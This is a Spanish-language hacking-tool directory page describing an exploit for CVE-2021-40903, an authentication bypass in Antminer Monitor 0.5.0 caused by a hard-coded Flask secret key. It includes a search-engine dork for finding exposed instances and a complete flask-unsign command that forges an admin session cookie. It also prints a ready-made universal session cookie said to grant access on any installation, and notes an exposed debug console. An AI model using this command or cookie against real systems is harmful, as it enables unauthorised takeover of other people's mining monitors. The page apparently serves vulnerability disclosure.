Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-40903 — CVE-2021-40903 | Kitploit
Herramientas/GitHubGitHub/vulnz/cve-2021-40903
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubvulnz/cve-2021-40903

CVE-2021-40903

CVE-2021-40903

Ver Repositorio
3hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Título del Exploit: Antminer Monitor 0.5.0 - Bypass de Autenticación

CVE: CVE-2021-40903

Fecha: 09/06/2021

Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 Autor del Exploit: CQR.company / Vulnz.

Página del Vendedor: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor

Enlace del Software: https://github.com/anselal/antminer-monitor, https://soulis.tech/

Versión: 0.5.0

Probado en: Windows, Linux, Macos

El software se usa comúnmente para monitorear antminers y se puede encontrar fácilmente en Zoomeye ( 800), Shodan ( 500). Por ahora es la herramienta de monitoreo de antminers más popular. La vulnerabilidad en Antminer Monitor existe debido a un backdoor o mala configuración realizada

por el desarrollador dentro del archivo de configuración en el servidor Flask.

El archivo de configuración tiene una cadena secreta predefinida, que normalmente se generaría aleatoriamente, pero es estática en esta compilación.build.antminer-monitor/settings.py en 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py

La clave secreta es 'super secret key'.

Basándonos en esta información, podemos crear cookies de bypass de autorización.

Usando el software flask-unsing podemos generar una cookie que te proporcionará acceso de administrador.

flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key" Además, puedes usar esta cookie universal para acceder a la interfaz web de la aplicación Flask.

Esta cookie puede funcionar en todos los sistemas en el campo "session".

.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU

Además, DEBUG = True, lo que significa que /console funciona, sin embargo necesita un pin.

Descargar herramienta